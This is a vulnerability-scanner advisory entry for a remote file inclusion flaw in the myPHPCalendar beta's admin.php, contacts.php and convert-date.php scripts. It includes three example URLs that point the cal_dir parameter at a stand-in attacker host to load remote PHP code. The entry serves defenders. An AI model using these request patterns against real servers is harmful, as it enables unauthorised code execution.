| VID |
21266 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The myPHPCalendar is vulnerable to a file injection vulnerability due to a flaw in multiple PHP files.
MyPHPCalendar is a freely available calendar program, written in PHP4, that uses a MySQL database for Microsoft Windows, Linux, and Unix-based operating systems. The version 10192000 Build 1 Beta of myPHPCalendar has a flaw that make the remote host include PHP files hosted on a hostile Web server, caused by a flaw in multiple scripts - admin.php, contacts.php, and convert-date.php. An attacker could install malicious PHP files on a hostile server and then use them to execute arbitrary code on the vulnerable system. A remote attacker could send a specially-crafted URL request to the 'admin.php' or 'contacts.php' script that specifies a malicious PHP file on a remote system as a parameter, which could allow to execute arbitrary code on the affected system.
http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/
* References:
http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0011.html
* Platforms Affected:
MyPHPCalendar 10192000 Build1 Beta
Linux Any version
Unix Any version
Windows Any version |
| Recommendation |
No solution for this vulnerability as of June 2014. |
| Related URL |
(CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
13409 (ISS) |
|
